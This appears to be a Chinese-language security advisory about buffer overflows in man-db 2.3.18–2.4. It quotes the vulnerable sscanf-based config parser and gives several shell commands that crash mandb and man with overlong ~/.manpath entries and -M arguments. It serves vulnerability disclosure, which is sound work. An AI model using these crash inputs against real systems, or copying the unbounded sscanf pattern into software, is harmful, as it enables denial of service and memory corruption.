受影响系统 man man 2.3.18
man man 2.3.19
man man 2.3.20
man man 2.4
详细描述man-db在调用多个sscanf()调用时没有进行正确边界检查,部分有问题代码如下:
static void add_to_dirlist (FILE *config, int user)
{
char *bp;
char buf[BUFSIZ];
char key[50], cont[512];
int c;
while ((bp = fgets (buf, BUFSIZ, config))) {
while (isspace (*bp))
bp++;
if (*bp == '#' || *bp == '\0')
continue;
else if (strncmp (bp, "NO", 2) == 0)
continue;
else if (sscanf (bp, "MANBIN %*s") == 1)
continue;
else if (sscanf (bp, "MANDATORY_MANPATH %s", key) == 1)
add_mandatory (key);
else if (sscanf (bp, "MANPATH_MAP %s %s", key, cont) == 2)
add_manpath_map (key, cont);
else if ((c = sscanf (bp, "MANDB_MAP %s %s", key, cont)) > 0)
add_mandb_map (key, cont, c, user);
else if ((c = sscanf (bp, "DEFINE %50s %511[^\n]",
key, cont)) > 0)
add_def (key, cont, c);
else if (sscanf (bp, "SECTION %511[^\n]", cont) == 1)
add_sections (cont);
else if (sscanf (bp, "SECTIONS %511[^\n]", cont) == 1)
/* Since I keep getting it wrong ... */
add_sections (cont);
else {
error (0, 0, _("can't parse directory list `%s'"), bp);
gripe_reading_mp_config (CONFIG_FILE);
}
}
}
可以看到MANDATORY_MANPATH, MANPATH_MAP, 和MANDB_MAP没有正确限制值写入key[50]或者cont[512],提供超长字符串可以触发漏洞。
另外在ult_src()函数处理上也存在此漏洞,及对PATH/MANPATH 参数缺少充分处理,可导致溢出。
测试代码# cd /tmp
# mkdir x
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# mandb
Segmentation fault
(can also apply this to the "man" binary, by fooling it with links)
# cd /tmp
# mkdir x
# ln /usr/bin/man mandb
# echo MANDB_MAP `perl -e 'print"x"x8100'` x >~/.manpath
# ./mandb
Segmentation fault
# man -M `perl -e 'print"/"x2100'`usr/share/man ls
...(verbose)
Segmentation fault
# cd /tmp
# mkdir man man/man1
# echo .so `perl -e 'print"x"x1024'` >man/man1/x.1
# man -M /tmp/man x
...(verbose)
Segmentation fault
# man -M `perl -e 'print"/tmp:"x260'` x
Segmentation fault
解决方案CVS服务器已经提供更新:
savannah.nongnu.org
相关信息参考:_blank href="http://www.securityfocus.com/archive/1/330907">http://www.securityfocus.com/archive/1/330907
